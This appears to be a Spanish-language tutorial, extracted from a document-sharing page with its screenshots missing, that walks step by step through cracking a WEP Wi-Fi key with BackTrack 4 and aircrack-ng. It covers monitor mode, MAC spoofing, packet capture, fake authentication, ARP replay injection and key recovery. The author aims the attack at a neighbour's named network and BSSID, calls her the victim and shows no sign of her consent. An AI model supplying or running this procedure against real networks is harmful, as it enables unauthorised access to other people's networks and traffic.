Está en la página 1de 8

Ya que descarguemos la imagen de Backtrack 4 podemos quemarlo en un CD(usarlo como

live CD) o usar un virtualizador como virtualbox para montar la imagen, usen el que mas se
le facilite.

Una vez dentro de Backtrack con nuestra memoria USB wireles Linksys WUSB54GC
conectada abrimos una consola y ponemos lo siguiente para identificar nuestra interfaz de
red.

 Bash |  Copiar |? 
1 airmon-ng

Después de identificada nuestra interfaz hacemos lo siguiente (en mi caso es wlan0), en la


misma ventana ponemos

 Bash |  Copiar |? 
1 airmon-ng stop wlan0

y después

 Bash |  Copiar |? 
1 airmon-ng start wlan0

Con eso tendremos algo asi:


Después de eso, cambiamos la macaddress de nuetro dispositivo ponemos lo siguiente:

 Bash |  Copiar |? 
1 macchanger –m 00:11:22:33:44:55 wlan0
y veremos algo como esto:

Con lo anterior le cambiamos la macaddress de manera temporal a la USB wireles Linksys


WUSB54GC para que sea mas fácil de recordar.

Después de eso en la misma consola ponemos lo siguiente

 Bash |  Copiar |? 
1 airodump-ng wlan0
Para escanear las redes que tenemos a nuestro alrededor, aparecerá algo como esto:

Donde notamos lo siguiente en mi caso hackeare la red de mi vecina adriana70 tenenmos


que fijarnos en los siguientes datos el channel (Columna CH) y en la macaddress de nuestra
víctima(columna BSSID) estos datos están señalados en la imagen anterior.

ahora en esa misma ventana precionamos ctrl+c, aparecera la linea de comando y ponemos
la siguiente instrucción teniendo precaución de sustituir los datos entre comillas con la
información de nuestra víctima.

 Bash |  Copiar |? 
1 airodump-ng -c "channel" -w guerrix --bssid "mac-a-atacar" wlan0

para el caso de mi víctima quedaría así:

 Bash |  Copiar |? 
1 airodump-ng -c 10 -w guerrix --bssid 00:1D:5A:19:05:11 wlan0

Donde “channel” lo sustituí por 10 y “mac-a-atacar” por 00:1D:5A:19:05:11, los datos de


mi vecina. Una ve que damos enter veremos algo como esto:

El recuadro en rojo debajo de #DATA indica la cantidad de paquetes que hemos inyectado
probablemente lo tengan en 0 o un numero demasiado bajo para cambiar eso hacemos lo
siguiente:

Abrimos una nueva terminal sin cerrar la que teníamos, ponemos el siguiente comando
teniendo cuidado de sustituir el texto entre comillas con los datos indicados:

 Bash |  Copiar |? 
1 aireplay-ng -1 0 -a "mac-a-tacar" -h "mi-mac" wlan0

Que dando algo asi, recuerden que al principio cambiamos nuestra mac por
00:11:22:33:44:55

 Bash |  Copiar |? 
1 aireplay-ng -1 0 -a 00:1D:5A:19:05:11 -h 00:11:22:33:44:55 wlan0

al dar enter y si no tenemos ningun error ponemos el siguiente comando de igual manera
teniendo cuidado de sustituir el texto entre comillas con los datos indicados:

 Bash |  Copiar |? 
1 aireplay-ng -3 -b "mac-a-tacar" -h "mi-mac" wlan0

En mi caso quedara:
 Bash |  Copiar |? 
1 aireplay-ng -3 -b 00:1D:5A:19:05:11 -h 00:11:22:33:44:55 wlan0

Al dar enter a esta ultima instrucción notaremos que empezamos a inyectar los paquetes y
si checamos la terminal que nos indica el #DATA veremos como ese valor se incrementa
rápidamente:

Una vez que el valor de #DATA pase los 30000 paquetes abrimos otra terminal, sin cerrar
las que tenemos abiertas y ponemos lo siguiente:
Nuevamente cuidado de sustituir lo que nos pide.

 Bash |  Copiar |? 
1 aircrack-ng -b "mac-a-atacar" guerrix-01.cap

En mi caso quedara así:

 Bash |  Copiar |? 
1 aircrack-ng -b 00:1D:5A:19:05:11 guerrix-01.cap
Después de dar enter si obtenemos un KEY FOUND! entonces felicidades han hackeado la
red.
Pero de no ser asi no se mortifiquen esperen a que el #DATA incremente a 60000 e
ingrecen de nuevo el comando anterior y si sigue fallando intenten a los 90000 y así dejen
que se valla incrementando hasta que encuentren la clave. El tiempo que se emplee en
descifrar la clave varia según la dificultad de esta ultima

También podría gustarte